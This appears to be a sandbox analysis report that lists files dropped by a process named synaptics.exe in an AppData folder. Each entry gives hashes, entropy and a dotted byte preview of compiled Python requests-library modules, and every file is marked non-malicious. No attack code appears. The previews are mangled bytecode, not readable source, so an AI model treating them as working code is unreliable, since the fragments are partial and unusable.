                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):973
                                                                                                                                                                                                            Entropy (8bit):5.247736205109825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Mlx1qlJ5pMUqTDP/+/khfamY+qnvWZ3b1e7N:MsRyDPGkNYxS3bUx
                                                                                                                                                                                                            MD5:F782D6AFA265B08CA352C6BD01B300B2
                                                                                                                                                                                                            SHA1:E88073464B43545654392648C2B7D1676F329634
                                                                                                                                                                                                            SHA-256:2A6F6264623551BC11A8E4F602389DAA3A0214FD18047D90A7CEC38CD0469C74
                                                                                                                                                                                                            SHA-512:7DD939373C2E491E7A93710447C40F11C317BF27DDA5CFEEAEED9B2D069183865DD391268C2A382C09A78EE0B0494561F0647C81CA318BFC9EFB0C75316EBE73
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24195
                                                                                                                                                                                                            Entropy (8bit):5.465037673640826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:d34FgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:d316Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                            MD5:C4C686240DC94EAC244EBFF074385EF6
                                                                                                                                                                                                            SHA1:964F615A2549C05A2467A2F881F3666AC6DEB429
                                                                                                                                                                                                            SHA-256:814742CCD7A401F20615DE4FC63C1867A761DD0B8A9A3644B9F56558FF379AB0
                                                                                                                                                                                                            SHA-512:59C73F8B12EDB42EC36F7431379B9D532981EA9ECDB91A70EF6FB9B273FFBCED6A523D89660C487115960C83DA3B434F63F1A7C63B8533B9AD90BE559AF2F5E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24195
                                                                                                                                                                                                            Entropy (8bit):5.465037673640826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:d34FgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:d316Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                            MD5:C4C686240DC94EAC244EBFF074385EF6
                                                                                                                                                                                                            SHA1:964F615A2549C05A2467A2F881F3666AC6DEB429
                                                                                                                                                                                                            SHA-256:814742CCD7A401F20615DE4FC63C1867A761DD0B8A9A3644B9F56558FF379AB0
                                                                                                                                                                                                            SHA-512:59C73F8B12EDB42EC36F7431379B9D532981EA9ECDB91A70EF6FB9B273FFBCED6A523D89660C487115960C83DA3B434F63F1A7C63B8533B9AD90BE559AF2F5E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):610
                                                                                                                                                                                                            Entropy (8bit):5.462111224002614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:COGzQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGmnfsZRhCUV/X:Pqwnq+sHIztRERi/uAfz3pmnfahCmX
                                                                                                                                                                                                            MD5:9D6ACB15C9E77ED3BF131549C583569C
                                                                                                                                                                                                            SHA1:24783643D24EE9D297F1A6A8BC15B403E560365C
                                                                                                                                                                                                            SHA-256:5D7B2B78527C89778545A32B1F280BF75E603E7FC549A110F75BDF0C5182091D
                                                                                                                                                                                                            SHA-512:8FFC7259767848F28578488408EC8B2896BF52CF9D45772B8E09C78601F0B9D8B3FA4E3825CCDAC2C41A0CC0072633C52FCBFE8C475980B7BF039FAE3C46518A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19703
                                                                                                                                                                                                            Entropy (8bit):5.466659265852559
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:oKLx6UqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:FFHGFHRjW2c/n8b
                                                                                                                                                                                                            MD5:F5B28BE977908086AC749367CF792982
                                                                                                                                                                                                            SHA1:93294841EA8CF46A220B84C3CA9B2230A4934DEE
                                                                                                                                                                                                            SHA-256:77D095D270623889B7C5F5814AE7678E4024FFAC2189296E99F1430B1320C9C7
                                                                                                                                                                                                            SHA-512:E3C4D19A923A08C8BF87E1AF3DD6DA2BA4C2E52A248627403D9B39599C96A19C1DA91AE60B5744341C04F61D2E81CEF3F41C44730723572F0D1383BCE816DF9E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19703
                                                                                                                                                                                                            Entropy (8bit):5.466659265852559
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:oKLx6UqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:FFHGFHRjW2c/n8b
                                                                                                                                                                                                            MD5:F5B28BE977908086AC749367CF792982
                                                                                                                                                                                                            SHA1:93294841EA8CF46A220B84C3CA9B2230A4934DEE
                                                                                                                                                                                                            SHA-256:77D095D270623889B7C5F5814AE7678E4024FFAC2189296E99F1430B1320C9C7
                                                                                                                                                                                                            SHA-512:E3C4D19A923A08C8BF87E1AF3DD6DA2BA4C2E52A248627403D9B39599C96A19C1DA91AE60B5744341C04F61D2E81CEF3F41C44730723572F0D1383BCE816DF9E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19703
                                                                                                                                                                                                            Entropy (8bit):5.466659265852559
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:oKLx6UqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:FFHGFHRjW2c/n8b
                                                                                                                                                                                                            MD5:F5B28BE977908086AC749367CF792982
                                                                                                                                                                                                            SHA1:93294841EA8CF46A220B84C3CA9B2230A4934DEE
                                                                                                                                                                                                            SHA-256:77D095D270623889B7C5F5814AE7678E4024FFAC2189296E99F1430B1320C9C7
                                                                                                                                                                                                            SHA-512:E3C4D19A923A08C8BF87E1AF3DD6DA2BA4C2E52A248627403D9B39599C96A19C1DA91AE60B5744341C04F61D2E81CEF3F41C44730723572F0D1383BCE816DF9E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4723
                                                                                                                                                                                                            Entropy (8bit):5.739966461831131
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:3+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeMG2F4K1r7w:3Wn3WKfr/piTNg+eCFs
                                                                                                                                                                                                            MD5:1E0D00805BF12DACDF1F853BCE290D81
                                                                                                                                                                                                            SHA1:2A73403DD95ACB95E5E79C5F8D628AF07675D32E
                                                                                                                                                                                                            SHA-256:215A4F7847556BE8FE009F3B79F255DD00C126E3DD0AAF4B83B60BBEB101176C
                                                                                                                                                                                                            SHA-512:74230A6CC946E19C10CF6D3EC9D416BBCA53867463BEF90E5A7673D01239935A0A8E414E64E1BF93F65465F65E9D4C861AC51880CC9342EE2598EDD8156653B5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4417
                                                                                                                                                                                                            Entropy (8bit):5.102572493706671
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:NVEvJgabXXYw+hwKMGZG3h+VLTovFx0qjax7evl:NUJrbXXLwtEhL39
                                                                                                                                                                                                            MD5:B863AE0AC56DF039891A30D4F49D4E46
                                                                                                                                                                                                            SHA1:D0421783237ADC2F82FEF7FB4F0E1A4C30EB5DAF
                                                                                                                                                                                                            SHA-256:7E1BC5C07CA5DE12C683A95E6F9C1509AD3005232513CB44CABCF587C66DE558
                                                                                                                                                                                                            SHA-512:4D4ED72D7072271BA24505922CEE12C8F09D283A00336BF8946F608A5C4EDD8AD8D46FC181C08A0350AA94B0C067B9FDCCDA3157FB4929200102853D3268CEA1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24605
                                                                                                                                                                                                            Entropy (8bit):5.589475363630152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:qwAXYu7d5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:q//54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                            MD5:7D6027D6F29A95E97853FE6177033891
                                                                                                                                                                                                            SHA1:D543F4B6A163DDDAA4CC14B0039CE2F57558764B
                                                                                                                                                                                                            SHA-256:44BB6BC21493FE242AC328391F48995993DE95DD138724C382FBFA9E2E221566
                                                                                                                                                                                                            SHA-512:CC6A274CE93EC838B8E3CBF4D7FCC1D30F337799C3362B7C916EFD12DE535FFE321D5775E3A8A52E085936D01D80EAF7C9406F175A8736243270287B742163D7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24605
                                                                                                                                                                                                            Entropy (8bit):5.589475363630152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:qwAXYu7d5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:q//54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                            MD5:7D6027D6F29A95E97853FE6177033891
                                                                                                                                                                                                            SHA1:D543F4B6A163DDDAA4CC14B0039CE2F57558764B
                                                                                                                                                                                                            SHA-256:44BB6BC21493FE242AC328391F48995993DE95DD138724C382FBFA9E2E221566
                                                                                                                                                                                                            SHA-512:CC6A274CE93EC838B8E3CBF4D7FCC1D30F337799C3362B7C916EFD12DE535FFE321D5775E3A8A52E085936D01D80EAF7C9406F175A8736243270287B742163D7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6105
                                                                                                                                                                                                            Entropy (8bit):5.51362280761965
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8/KVMbgcD9Q0jnBw/lM2oAHlKR2RPRlcLJCuhvPFor70S1lDhzQwePa/vpy6hqbh:JVIgchjjneT9CFCuh8NlBTePE4RrH
                                                                                                                                                                                                            MD5:57228DFE1E5CBBE59DD027FB5E498138
                                                                                                                                                                                                            SHA1:A9BE83E23F96B69CFDE54B58A6157CA924E1821E
                                                                                                                                                                                                            SHA-256:A1A15D79112FC5400B4F28978B5B3FC401F7EC6D28BD0E1B7620A9F5748E9E1A
                                                                                                                                                                                                            SHA-512:5581B0E58B82A0B630AC963700DB6B7886133F34AB38432EEF62820523959DDB87299A930615FEF0B58899BD19B1FC2DD2E338853536C3866B44C89CAFE3532D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
